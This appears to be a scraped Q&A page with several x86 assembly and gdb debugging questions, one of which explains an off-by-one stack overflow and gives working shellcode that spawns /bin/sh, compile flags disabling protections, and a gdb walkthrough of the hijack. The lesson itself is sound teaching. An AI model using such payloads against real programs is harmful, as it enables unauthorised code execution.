passing character pointers to an external x86 32bit function - c

I am trying to write a small program that takes two hard coded character pointers and switches the contents that they point to using an external x86 32bit function located in a .S file. I am using the basic gcc compiler. Here is my C code:
valSwap.c:
#include <stdio.h>
void extern swapMe(char* c, char* d);
int main() {
char* c = "boi";
char* d = "bra";
printf("%s, %s", c, d);
swapMe(c, d);
printf("%s, %s", c, d);
return 0;
}
Before running swapMe(c, d) the strings that c and d point to are quite clear. After running swapMe(c, d) I get a Segmentation Fault. Here is my code for the swapMe external function:
swapMe.S:
.intel_syntax noprefix
.text
.global swapMe
swapMe:
push edi
push esi
mov eax, [esp+4]
mov ecx, [esp+8]
mov edi, [eax]
mov esi, [ecx]
mov [eax], esi
mov [ecx], edi
pop esi
pop edi
ret
Now since swapMe(c, d) is taking in 2 parameters using the cdecl calling convention I should find c and d on the stack at $esp+4 and $esp+8. I tried to print these values to confirm that they are what I expect. Either they are not what I expected or I tried to print them incorrectly:
(gdb) p/s $esp+4
$1 = (void *) 0xffffdb08
(gdb) x/s $esp+4
0xffffdb08: ""
(gdb) p/s *($esp+4)
Attempt to dereference a generic pointer.
(gdb) x/s *($esp+4)
Attempt to dereference a generic pointer.
I also tried printing $eax as a string since I moved the contents of $esp+4 into $eax.
(gdb) p/x $eax
$3 = 0xf7fa0000
(gdb) x/s $eax
0xf7fa0000: "\260=\033"
(gdb) x/s *$eax
0x1b3db0: <error: Cannot access memory at address 0x1b3db0>
(gdb) x/x $eax
0xf7fa0000: 0xb0
I also printed the hex values of c and d before entering swapMe to see if I'm at least getting the correct value:
(gdb) p &c
$12 = (char **) 0xffffdb2c
(gdb) p c
$16 = 0x565556c0 "boi"
(gdb) p &d
$14 = (char **) 0xffffdb28
(gdb) p d
$15 = 0x565556c4 "bra"
I printed a few others values that may be relevant as well:
30x56555621 <swapMe+2> mov eax,DWORD PTR [esp+0x4] 3
30x56555625 <swapMe+6> mov ecx,DWORD PTR [esp+0x8] 3
>30x56555629 <swapMe+10> mov edi,DWORD PTR [eax] 3
30x5655562b <swapMe+12> mov esi,DWORD PTR [ecx]
(gdb) p/x $eax
$8 = 0xf7fa0000
0x56555621 <swapMe+2> mov eax,DWORD PTR [esp+0x4] 3
30x56555625 <swapMe+6> mov ecx,DWORD PTR [esp+0x8] 3
30x56555629 <swapMe+10> mov edi,DWORD PTR [eax] 3
>30x5655562b <swapMe+12> mov esi,DWORD PTR [ecx] 3
30x5655562d <swapMe+14> mov DWORD PTR [eax],esi 3
30x5655562f <swapMe+16> mov DWORD PTR [ecx],edi
p/x $edi
$11 = 0x1b3db0
30x56555621 <swapMe+2> mov eax,DWORD PTR [esp+0x4] 3
30x56555625 <swapMe+6> mov ecx,DWORD PTR [esp+0x8] 3
30x56555629 <swapMe+10> mov edi,DWORD PTR [eax] 3
30x5655562b <swapMe+12> mov esi,DWORD PTR [ecx] 3
>30x5655562d <swapMe+14> mov DWORD PTR [eax],esi 3
30x5655562f <swapMe+16> mov DWORD PTR [ecx],edi
(gdb) p/x $ecx
$19 = 0x565555f5
(gdb) p/x $esi
$20 = 0x8310c483
I don't understand why I'm getting different values when I print the values of $eax, $edi, $ecx, and $esp in swapMe vs when I print the values associated with c and d before calling swapMe. Since swapMe takes in c and d as parameters, I expected to see the same values on the stack when calling swapMe but I do not. I did not see 0xffffdb2c or 0x565556c0 once when printing any registers. Please clarify what I did wrong when calling the function, passing in the parameters, or printing the values in the registers. I'm very new to x86 so I probably made a rookie mistake somewhere.

Related

Why does this generated assembly code seem to contain nonsense? [duplicate]

This question already has an answer here:
Why does clang produce inefficient asm with -O0 (for this simple floating point sum)?
(1 answer)
Closed 3 years ago.
I used https://godbolt.org/ with "x86-64 gcc 9.1" to assemble the following C code to understand why passing a pointer to a local variable as a function argument works. Now I have difficulties to understand some steps.
I commented on the lines I have difficulties with.
void printStr(char* cpStr) {
printf("str: %s", cpStr);
}
int main(void) {
char str[] = "abc";
printStr(str);
return 0;
}
.LC0:
.string "str: %s"
printStr:
push rbp
mov rbp, rsp
sub rsp, 16 ; why allocate 16 bytes when using it just for the pointer to str[0] which is 4 bytes long?
mov QWORD PTR [rbp-8], rdi ; why copy rdi to the stack...
mov rax, QWORD PTR [rbp-8] ; ... just to copy it into rax again? Also rax seems to already contain the pointer to str[0] (see *)
mov rsi, rax
mov edi, OFFSET FLAT:.LC0
mov eax, 0
call printf
nop
leave
ret
main:
push rbp
mov rbp, rsp
sub rsp, 16 ; why allocate 16 bytes when "abc" is just 4 bytes long?
mov DWORD PTR [rbp-4], 6513249
lea rax, [rbp-4] ; pointer to str[0] copied into rax (*)
mov rdi, rax ; why copy the pointer to str[0] to rdi?
call printStr
mov eax, 0
leave
ret
Thanks to the help of Jester I could solve my confusion. The following code is compiled with the "-O1" flag of GCC (for me the best optimization level to understand what's going on):
.LC0:
.string "str: %s"
printStr:
sub rsp, 8
; now the call to printf gets prepared, rdi = first argument, rsi = second argument
mov rsi, rdi ; move str[0] to rsi
mov edi, OFFSET FLAT:.LC0 ; move address of static string literal "str: %s" to edi
mov eax, 0 ; set eax to the number of vector registers used, because printf is a varargs function
call printf
add rsp, 8
ret
main:
sub rsp, 24
mov DWORD PTR [rsp+12], 6513249 ; create string "abc" on the stack
lea rdi, [rsp+12] ; move address of str[0] (pointer to 'a') to rdi (first argument for printStr)
call printStr
mov eax, 0
add rsp, 24
ret
As Jester said, the 16 bytes were allocated for alignment. There is a good post on Stack Overflow which explains this here.
Edit:
There is a post on Stack Overflow which explains why al is zeroed before a call to a varargs function here.

Using the Ollydbg,anyone tell me what the address of the variable "a" is?

My very simple tested program
#include<stdio.h>
#include<stdlib.h>
int main()
{
int a = 12345;
printf("%d\n", a);
system("PAUSE");
return 0;
}
After compiled and connected,the EXE file is created.Then I open the EXE file in the Ollydbg:
The picture shows the main() function.But I can't find out what the address of the variable a is. When passing the params to the printf() function,it push 3039 into the stack, then it means the value of the variable a is 3039? No,the value is 12345. So it means the address of the variable a is 00003039? Anyone
Address of the a variable is [ebp-8]. You are seeing 0x3039 assignment, because decimal 12345 is hexadecimal 0x3039. If you change your code to use hex value: int a = 0x12345, results would be more clear:
Numeric constants are usually compiled directly into the code.
so you want to know the address of the variable a.
Extremely simple:
insert this statement into your program.
printf( "address of variable 'a' is: %p\n", &a );
How are we to know the address?
We are not sitting at your computer
and it will be different on most every computer.
Use the suggested call to printf() to learn the 'address'
HOWEVER, due to paging, address translation, virtual addressing, etc. That address is NOT the actual physical address within your computers' memory space.
local variables like in this case, a, are stored in the stack, so they can be discarded when a function execution is finished, so basically a is simply located at the memory address of the local stack frame.
int a = 12345; // MOV DWORD PTR SS:[EBP-8], 3039
printf("%d\n", a);
in this case, a is located in [EBP-8], if you inspect where it is pointing, you can see the value 3039, stored in there of course after the assignment, 3039 is a hex number, which of course 12345 in base 10.
To get better understanding of this, let's modify the program a little bit and debug it in GDB.
C:\Codes>gdb test -q
Reading symbols from C:\Codes\test.exe...done.
(gdb) set disassembly-flavor intel
(gdb) list
1 #include<stdio.h>
2
3 int main()
4 {
5 int a = 12345;
6 int b = 0x12345;
7 printf("Variable a %d (decimal) or 0x%x (hex), located at %p or 0x%x\n", a,a,&a,&a);
8 printf("Variable b %d (decimal) or 0x%x (hex), located at %p or 0x%x\n", b,b,&b,&b);
9 return 0;
10 }
(gdb)
Standard Output
C:\Codes>test
Variable a 12345 (decimal) or 0x3039 (hex), located at 0022FF4C or 0x22ff4c
Variable b 74565 (decimal) or 0x12345 (hex), located at 0022FF48 or 0x22ff48
As you can see, the virtual memory addresses of variable a and b is actually located at 0x22ff4c and 0x22ff48 respectively.
Let's take a look at this program in GDB.
(gdb) break 7
Breakpoint 1 at 0x40135e: file test.c, line 7.
(gdb) run
Starting program: C:\Codes/test.exe
[New Thread 3680.0xed8]
Breakpoint 1, main () at test.c:7
7 printf("Variable a %d (decimal) or 0x%x (hex), located at %p or 0x%x\n", a,a,&a,&a);
(gdb) disassemble
Dump of assembler code for function main:
0x00401340 <+0>: push ebp
0x00401341 <+1>: mov ebp,esp
0x00401343 <+3>: and esp,0xfffffff0
0x00401346 <+6>: sub esp,0x30
0x00401349 <+9>: call 0x401970 <__main>
0x0040134e <+14>: mov DWORD PTR [esp+0x2c],0x3039
0x00401356 <+22>: mov DWORD PTR [esp+0x28],0x12345
=> 0x0040135e <+30>: mov edx,DWORD PTR [esp+0x2c]
0x00401362 <+34>: mov eax,DWORD PTR [esp+0x2c]
0x00401366 <+38>: lea ecx,[esp+0x2c]
0x0040136a <+42>: mov DWORD PTR [esp+0x10],ecx
0x0040136e <+46>: lea ecx,[esp+0x2c]
0x00401372 <+50>: mov DWORD PTR [esp+0xc],ecx
0x00401376 <+54>: mov DWORD PTR [esp+0x8],edx
0x0040137a <+58>: mov DWORD PTR [esp+0x4],eax
0x0040137e <+62>: mov DWORD PTR [esp],0x403024
0x00401385 <+69>: call 0x401be0 <printf>
0x0040138a <+74>: mov edx,DWORD PTR [esp+0x28]
0x0040138e <+78>: mov eax,DWORD PTR [esp+0x28]
0x00401392 <+82>: lea ecx,[esp+0x28]
0x00401396 <+86>: mov DWORD PTR [esp+0x10],ecx
0x0040139a <+90>: lea ecx,[esp+0x28]
0x0040139e <+94>: mov DWORD PTR [esp+0xc],ecx
0x004013a2 <+98>: mov DWORD PTR [esp+0x8],edx
0x004013a6 <+102>: mov DWORD PTR [esp+0x4],eax
0x004013aa <+106>: mov DWORD PTR [esp],0x403064
0x004013b1 <+113>: call 0x401be0 <printf>
0x004013b6 <+118>: mov eax,0x0
0x004013bb <+123>: leave
0x004013bc <+124>: ret
End of assembler dump.
(gdb)
And focus on this line
0x0040134e <+14>: mov DWORD PTR [esp+0x2c],0x3039
0x00401356 <+22>: mov DWORD PTR [esp+0x28],0x12345
As you can see from the previous output, the virtual memory address of variables a and b is actually located at [esp+0x2c] or 0x22ff4c and [esp+0x28] or 0x22ff48 respectively.
while
0x3039 & 0x12345 are the value of variables a and b in hexadecimal.
To verify the memory address of these variables in GDB, use print command as follows:
(gdb) print &a
$1 = (int *) 0x22ff4c
(gdb) print &b
$2 = (int *) 0x22ff48
Also, you might wonder where the address of 0x22ff4c or 0x22ff48 come from.
To understand this, let's check the value of current ESP register
(gdb) info registers esp
esp 0x22ff20 0x22ff20
Then, replace the actual ESP value
[esp+0x2c] = [0x22ff20 + 0x2c] = 0x22ff4c
[esp+0x28] = [0x22ff20 + 0x28] = 0x22ff48

Offbyone buffer overflow NULL byte in payload

So I was trying Offbyone Buffer overflow with the help of this following simple code
#include <string.h>
void cpy(char *x){
char buf[128]="";
strncat(buf,x,sizeof(buf));
}
int main(int argc, char **argv)
{
cpy(argv[1]);
}
As this diagram depicts how an Offbyone buffer over flow works
Taken from : https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481
Here is the Disassembly of main and cpy
Here is the payload that I used
Memory dumps
So using the buffer , in the Cpy stack frame i change the value of the saved RBP's least significant byte to 00 ( because of the Offbyone overflow achieved by providing exactly 128byte input )
As you can see the address 0x7fffffffe177 has stored EBP whose value is changed from 0x7fffffffe190 to 0x7fffffffe100
So I went ahead and had the starting address of my payload at the address 0x7fffffffe10F which is also the return address of main
which is supposed to be 0xffffe110 0x00007fff instead of 0xffffe110 0x90907fff but since we shouldn't have 00 in payload I am not able to set the return address because since it's an 64bit address is of 8byte long 0xffffe110 0x00007fff
So how exactly should we have the return address here ?
And since the image of the memory dump, in break point 1 , its the cpy function frame why is argc and argv [] on the top of the stack ?
I am new to Exploit writing and all the help will be much appreciated .
So let's start with a description of the trick that can be used to set the desired return address value without passing zero bytes in payload.
I've changed your code a little bit to make it easier to do the trick. Here is new code:
#include <string.h>
int i;
void cpy(char *x) {
char buf[128];
for (i = 0; i <= 128; ++i) {
buf[i] = x[i];
}
}
int main(int argc, char **argv) {
cpy(argv[1]);
return 0;
}
The main difference is that now we can control the value of the less significant byte of saved rbp. In your example we only can set it to zero.
So here the stack frame of our cpy function:
#rbp - saved base stack pointer of main function
#rsp - stack pointer at the start of cpy function (right after push rbp)
The trick is that we overwrite the last byte in such way that #rbp = #rsp - 8. So when we return from main function $rbp will be equal to #rsp - 8 and thus return address will be 8 bytes before #rsp - 8 i.e. also #rsp - 8!
After return from main we will jump to #rsp - 8. So now we simply put jmp to shellcode at this address and we are done:
But in your original example this trick can't be done because we can't control value of less significant byte of #rbp.
It should also be noted that this trick will not work if #rbp and #rsp differ more than in one last byte.
And finally here is exploit.
Compile code with executable stack and without stack protection:
$ gcc test.c -o test -z execstack -fno-stack-protector
Get byte code for our jmp to shellcode:
$ rasm2 -a x86 -b 64 'jmp -0x50'
ebae
Exploit under gdb:
$ gdb --args test $(python -c 'print "\x90" * 91 + "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" + "\xeb\xb8" + "a" * 6 + "\xc8"')
>>> b cpy
>>> b *cpy+90
>>> r
Breakpoint 1, 0x00000000004004aa in cpy ()
So here is saved rbp:
>>> x/1gx $rbp
0x7fffffffd3d0: 0x00007fffffffd3f0
Here is rsp at the start of cpy function:
>>> p/x $rsp
$1 = 0x7fffffffd3d0
The value of rbp which we want to get after return from cpy (that's why last byte of payload is \xc8)
>>> p/x $rsp - 8
$2 = 0x7fffffffd3c8
Continue to the end of cpy:
>>> c
Breakpoint 2, 0x0000000000400500 in cpy ()
Asm code of cpy:
>>> disassemble cpy
Dump of assembler code for function cpy:
0x00000000004004a6 <+0>: push rbp
0x00000000004004a7 <+1>: mov rbp,rsp
0x00000000004004aa <+4>: sub rsp,0x10
0x00000000004004ae <+8>: mov QWORD PTR [rbp-0x88],rdi
0x00000000004004b5 <+15>: mov DWORD PTR [rip+0x20046d],0x0 # 0x60092c <i>
0x00000000004004bf <+25>: jmp 0x4004f2 <cpy+76>
0x00000000004004c1 <+27>: mov eax,DWORD PTR [rip+0x200465] # 0x60092c <i>
0x00000000004004c7 <+33>: mov edx,DWORD PTR [rip+0x20045f] # 0x60092c <i>
0x00000000004004cd <+39>: movsxd rcx,edx
0x00000000004004d0 <+42>: mov rdx,QWORD PTR [rbp-0x88]
0x00000000004004d7 <+49>: add rdx,rcx
0x00000000004004da <+52>: movzx edx,BYTE PTR [rdx]
0x00000000004004dd <+55>: cdqe
0x00000000004004df <+57>: mov BYTE PTR [rbp+rax*1-0x80],dl
0x00000000004004e3 <+61>: mov eax,DWORD PTR [rip+0x200443] # 0x60092c <i>
0x00000000004004e9 <+67>: add eax,0x1
0x00000000004004ec <+70>: mov DWORD PTR [rip+0x20043a],eax # 0x60092c <i>
0x00000000004004f2 <+76>: mov eax,DWORD PTR [rip+0x200434] # 0x60092c <i>
0x00000000004004f8 <+82>: cmp eax,0x80
0x00000000004004fd <+87>: jle 0x4004c1 <cpy+27>
0x00000000004004ff <+89>: nop
=> 0x0000000000400500 <+90>: leave
0x0000000000400501 <+91>: ret
End of assembler dump.
Value of rbp after leave:
>>> ni
>>> p/x $rbp
$1 = 0x7fffffffd3c8
Execute till the end of main:
>>> ni
>>> ni
>>> ni
>>> disassemble
Dump of assembler code for function main:
0x0000000000400502 <+0>: push rbp
0x0000000000400503 <+1>: mov rbp,rsp
0x0000000000400506 <+4>: sub rsp,0x10
0x000000000040050a <+8>: mov DWORD PTR [rbp-0x4],edi
0x000000000040050d <+11>: mov QWORD PTR [rbp-0x10],rsi
0x0000000000400511 <+15>: mov rax,QWORD PTR [rbp-0x10]
0x0000000000400515 <+19>: add rax,0x8
0x0000000000400519 <+23>: mov rax,QWORD PTR [rax]
0x000000000040051c <+26>: mov rdi,rax
0x000000000040051f <+29>: call 0x4004a6 <cpy>
0x0000000000400524 <+34>: mov eax,0x0
0x0000000000400529 <+39>: leave
=> 0x000000000040052a <+40>: ret
End of assembler dump.
>>> ni
Now we at #rsp - 8 and here is our jmp to shellcode:
>>> disassemble $rip,+2
Dump of assembler code from 0x7fffffffd3c8 to 0x7fffffffd3ca:
=> 0x00007fffffffd3c8: jmp 0x7fffffffd382
End of assembler dump.
And finally shellcode:
>>> ni
>>> disassemble $rip,+0x50
Dump of assembler code from 0x7fffffffd382 to 0x7fffffffd3d2:
=> 0x00007fffffffd382: nop
0x00007fffffffd383: nop
0x00007fffffffd384: nop
0x00007fffffffd385: nop
...
0x00007fffffffd3ab: xor rdi,rdi
0x00007fffffffd3ae: push rdi
0x00007fffffffd3af: push rdi
0x00007fffffffd3b0: pop rsi
0x00007fffffffd3b1: pop rdx
0x00007fffffffd3b2: movabs rdi,0x68732f6e69622f2f
0x00007fffffffd3bc: shr rdi,0x8
0x00007fffffffd3c0: push rdi
0x00007fffffffd3c1: push rsp
0x00007fffffffd3c2: pop rdi
0x00007fffffffd3c3: push 0x3b
0x00007fffffffd3c5: pop rax
0x00007fffffffd3c6: syscall

What does gdb 'x' command do?

I am reading a book about hacking and it has a chapter about assembly.
Following is my tiny program written in C.
#include <stdio.h>
int main(int argc, char const *argv[])
{
int i;
for (i = 0; i < 10; i++) {
puts("Hello World!");
}
return 0;
}
And the following is gdb test:
(gdb) break main
Breakpoint 1 at 0x40050f: file main.c, line 7.
(gdb) run
Breakpoint 1, main (argc=1, argv=0x7fffffffe708) at main.c:7
7 for (i = 0; i < 10; i++) {
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400500 <+0>: push rbp
0x0000000000400501 <+1>: mov rbp,rsp
0x0000000000400504 <+4>: sub rsp,0x20
0x0000000000400508 <+8>: mov DWORD PTR [rbp-0x14],edi
0x000000000040050b <+11>: mov QWORD PTR [rbp-0x20],rsi
=> 0x000000000040050f <+15>: mov DWORD PTR [rbp-0x4],0x0
0x0000000000400516 <+22>: jmp 0x400526 <main+38>
0x0000000000400518 <+24>: mov edi,0x4005c4
0x000000000040051d <+29>: call 0x4003e0 <puts#plt>
0x0000000000400522 <+34>: add DWORD PTR [rbp-0x4],0x1
0x0000000000400526 <+38>: cmp DWORD PTR [rbp-0x4],0x9
0x000000000040052a <+42>: jle 0x400518 <main+24>
0x000000000040052c <+44>: mov eax,0x0
---Type <return> to continue, or q <return> to quit---
0x0000000000400531 <+49>: leave
0x0000000000400532 <+50>: ret
End of assembler dump.
The following part is the things that I don't understand. Please note that $rip is the "instruction pointer" and points to 0x000000000040050f <+15>
(gdb) x/x $rip
0x40050f <main+15>: 0x00fc45c7
(gdb) x/12x $rip
0x40050f <main+15>: 0x00fc45c7 0xeb000000 0x05c4bf0e 0xbee80040
0x40051f <main+31>: 0x83fffffe 0x8301fc45 0x7e09fc7d 0x0000b8ec
0x40052f <main+47>: 0xc3c90000 0x1f0f2e66 0x00000084 0x1f0f0000
(gdb) x/8xb $rip
0x40050f <main+15>: 0xc7 0x45 0xfc 0x00 0x00 0x00 0x00 0xeb
(gdb) x/8xh $rip
0x40050f <main+15>: 0x45c7 0x00fc 0x0000 0xeb00 0xbf0e 0x05c4 0x0040 0xbee8
(gdb) x/8xw $rip
0x40050f <main+15>: 0x00fc45c7 0xeb000000 0x05c4bf0e 0xbee80040
0x40051f <main+31>: 0x83fffffe 0x8301fc45 0x7e09fc7d 0x0000b8ec
First command x/x $rip outputs 0x40050f <main+15>: 0x00fc45c7.
Is it the instruction at 0x40050f?
Is 0x00fc45c7 same as mov DWORD PTR [rbp-0x4],0x0 (assembled instruction at 0x40050f)?
Secondly, if it is the instruction, what are those hex numbers from the output of commands x/12x $rip, x/8xw $rip, x/8xh $rip?
As to (1), you got that correct.
As to (2), the x command has up to 3 specifiers: how many objects to print; in which format; and what object size. In all your examples you choose to print as hex (x). As to the first specifier, you ask to print 12, 8, 8 objects.
As to the last specifier in your cases:
x/12x has none, so gdb defaults to assuming you want 4-byte chunks (which GDB calls "words", x86 calls "double words"). Generally, I'd always specify what exactly you want as opposed to falling back on default settings.
x/8xw does the same, for 8 objects, as you explicitly requested dwords now.
(The x command defaults to the last size you used, but the initial default for that on startup is w words)
x/8xh requests half-word sized chunks of 2 bytes, so objects printed in 2 byte chunks. (Half-word relative to GDB's standard 32-bit word size; x86 calls this a "word").
In case you wonder why the concatenation of two neighboring values does not equal what was reported when you printed in dwords, this is because the x86 is a little-endian architecture. What that means is detailed quite well in Erickson's book again - if you look a few pages ahead, he does some calculations you might find helpful. In a nutshell, if you recombine them (2,1) (4,3), ..., you'll see they match.
(gdb) help x
Examine memory: x/FMT ADDRESS.
ADDRESS is an expression for the memory address to examine.
FMT is a repeat count followed by a format letter and a size letter.
Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal),
t(binary), f(float), a(address), i(instruction), c(char) and s(string),
T(OSType), A(floating point values in hex).
Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes).
The specified number of objects of the specified size are printed
according to the format.
Defaults for format and size letters are those previously used.
Default count is 1. Default address is following last thing printed
with this command or "print".

Arrays pointers on 32bit and 64bit systems

The following code prints different results on 32bit and 64bit systems:
#include <stdio.h>
void swapArray(int **a, int **b)
{
int *temp = *a;
*a = *b;
*b = temp;
}
int main()
{
int a[2] = {1, 3};
int b[2] = {2, 4};
swapArray(&a, &b);
printf("%d\n", a[0]);
printf("%d\n", a[1]);
return 0;
}
After compiling it in 32bit system, the output is:
2
3
On 64bit the output is:
2
4
As I understand, the function swapArray just swaps the pointers to the first elements in a and b. So after calling swapArray, a should point to 2 and b should point to 1.
For this reason a[0] should yield 2, and a[1] should reference the next byte in memory after the location of 2, which contains 4.
Can anyone please explain?
Edit:
Thanks to the comments and answers, I now notice that &a and &b are of type int (*)[] and not int **. This obviously makes the code incorrect (and indeed I get a compiler warning). It is intriguing, though, why the compiler (gcc) just gives a warning and not an error.
I am still left with the question what causes different results on different systems, but since the code is incorrect, it is less relevant.
Edit 2:
As for the different results on different systems, I suggest reading AndreyT's comment.
swapArray(&a, &b);
&a and &b are not of type int ** but of type int (*)[2]. BTW your compiler is kind enough to accept your program but a compiler has the right to refuse to translate it.
Before answering your question lets see what happens under the hood during a pointer operation. I'm using a very simple code to demonstrate this :
#include <stdio.h>
int main() {
int *p;
int **p2;
int x = 3;
p = &x;
p2 = &p;
return 0;
}
Now look at the disassembly :
(gdb) disassemble
Dump of assembler code for function main:
0x0000000000400474 <+0>: push rbp
0x0000000000400475 <+1>: mov rbp,rsp
0x0000000000400478 <+4>: mov DWORD PTR [rbp-0x14],0x3
0x000000000040047f <+11>: lea rax,[rbp-0x14]
0x0000000000400483 <+15>: mov QWORD PTR [rbp-0x10],rax
0x0000000000400487 <+19>: lea rax,[rbp-0x10]
0x000000000040048b <+23>: mov QWORD PTR [rbp-0x8],rax
=> 0x000000000040048f <+27>: mov eax,0x0
0x0000000000400494 <+32>: leave
0x0000000000400495 <+33>: ret
The disassembly is pretty self evident. But a few note need to be added here,
My function's stack frame starts from here:
0x0000000000400474 <+0>: push rbp
0x0000000000400475 <+1>: mov rbp,rsp
So lets what they have for now
(gdb) info registers $rbp
rbp 0x7fffffffe110 0x7fffffffe110
here we are putting value 3 in [rbp - 0x14]'s address. lets see the memory map
(gdb) x/1xw $rbp - 0x14
0x7fffffffe0fc: 0x00000003
Its important to notice the DWORD datatype is used, which is a 32 bits wide. So on the side note, integer literals like 3 is treated treated as 4 bytes unit.
Next instruction uses lea to load the effective address of the value just saved in earlier instruction.
0x000000000040047f <+11>: lea rax,[rbp-0x14]
It means that now $rax will have the value 0x7fffffffe0fc.
(gdb) p/x $rax
$4 = 0x7fffffffe0fc
Next we will save this address into memory using
0x0000000000400483 <+15>: mov QWORD PTR [rbp-0x10],rax
Important thing to note that a QWORD which is used here. Because 64bit systems have 8 byte native pointer size. 0x14 - 0x10 = 4 bytes were used in earlier mov instruction.
Next we have :
0x0000000000400487 <+19>: lea rax,[rbp-0x10]
0x000000000040048b <+23>: mov QWORD PTR [rbp-0x8],rax
This is again for the second indirection. always all the value related to addresses are QWORD. This is important thing to take a note of this.
Now lets come to your code.
Before calling to swaparray you have :
=> 0x00000000004004fe <+8>: mov DWORD PTR [rbp-0x10],0x1
0x0000000000400505 <+15>: mov DWORD PTR [rbp-0xc],0x3
0x000000000040050c <+22>: mov DWORD PTR [rbp-0x20],0x2
0x0000000000400513 <+29>: mov DWORD PTR [rbp-0x1c],0x4
0x000000000040051a <+36>: lea rdx,[rbp-0x20]
0x000000000040051e <+40>: lea rax,[rbp-0x10]
0x0000000000400522 <+44>: mov rsi,rdx
0x0000000000400525 <+47>: mov rdi,rax
This is very trivial. Your array is initialized and the effect of & operator is visible when the effective address of the start of array is loaded into $rdi and $rsi.
Now lets see what its doing inside swaparray().
The start of your array is saved into $rdi and $rsi. So lets see their contents
(gdb) p/x $rdi
$2 = 0x7fffffffe100
(gdb) p/x $rsi
$3 = 0x7fffffffe0f0
0x00000000004004c8 <+4>: mov QWORD PTR [rbp-0x18],rdi
0x00000000004004cc <+8>: mov QWORD PTR [rbp-0x20],rsi
Now the first statement int *temp = *a is performed by following instructions.
0x00000000004004d0 <+12>: mov rax,QWORD PTR [rbp-0x18]
0x00000000004004d4 <+16>: mov rax,QWORD PTR [rax]
0x00000000004004d7 <+19>: mov QWORD PTR [rbp-0x8],rax
Now comes the defining moment, what's happening with your *a?
It loads into $rax the value stored in [rbp - 0x18]. where the value $rdi was saved. which in turn holds the address of the first element of the first array.
performs another indirection by using the address stored into $rax to fetch a QWARD and loads it into $rax. So what it will return? it will return a QWARD from 0x7fffffffe100. Which will in effect form a 8 byte quantity from two four byte quantity saved there. To elaborate,
The memory there is like below.
(gdb) x/2xw $rdi
0x7fffffffe100: 0x00000001 0x00000003
Now if you fetch a QWORD
(gdb) x/1xg $rdi
0x7fffffffe100: 0x0000000300000001
So already you are actually screwed. Because you are fetching with incorrect boundary.
The rest of the codes can be explained in similar manner.
Now why its different in 32 bit platform? because in 32 bit platform the native pointer width is 4 bytes. So the thing here will be different there. The main problem with your semantically incorrect code originates from the difference in integer type width and native pointer types. If you have both the same, you may still work around your code.
But you should never write code which assumes the size of native types. That's why standards are for. that's why your compiler is giving you warning.
From language point of view its a type mismatch which is already pointed out in the earlier answers so i'm not going into that.
You can't swap arrays using the pointer trick (they are not pointers!). You would either have to create pointers to those arrays and use the pointers or dynamically allocate the arrays using malloc etc.
The results I get on a 64-bit system are different than yours for example, I get:
2
3
test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.8, not stripped
And with clang on my mac I get an error:
test.cpp: In function ‘int main()’:
test.cpp:13: error: cannot convert ‘int (*)[2]’ to ‘int**’ for argument ‘1’ to ‘void swapArray(int**, int**)’
I assume that this is undefined behavior and you are trying to interpret what is probably junk output.

Resources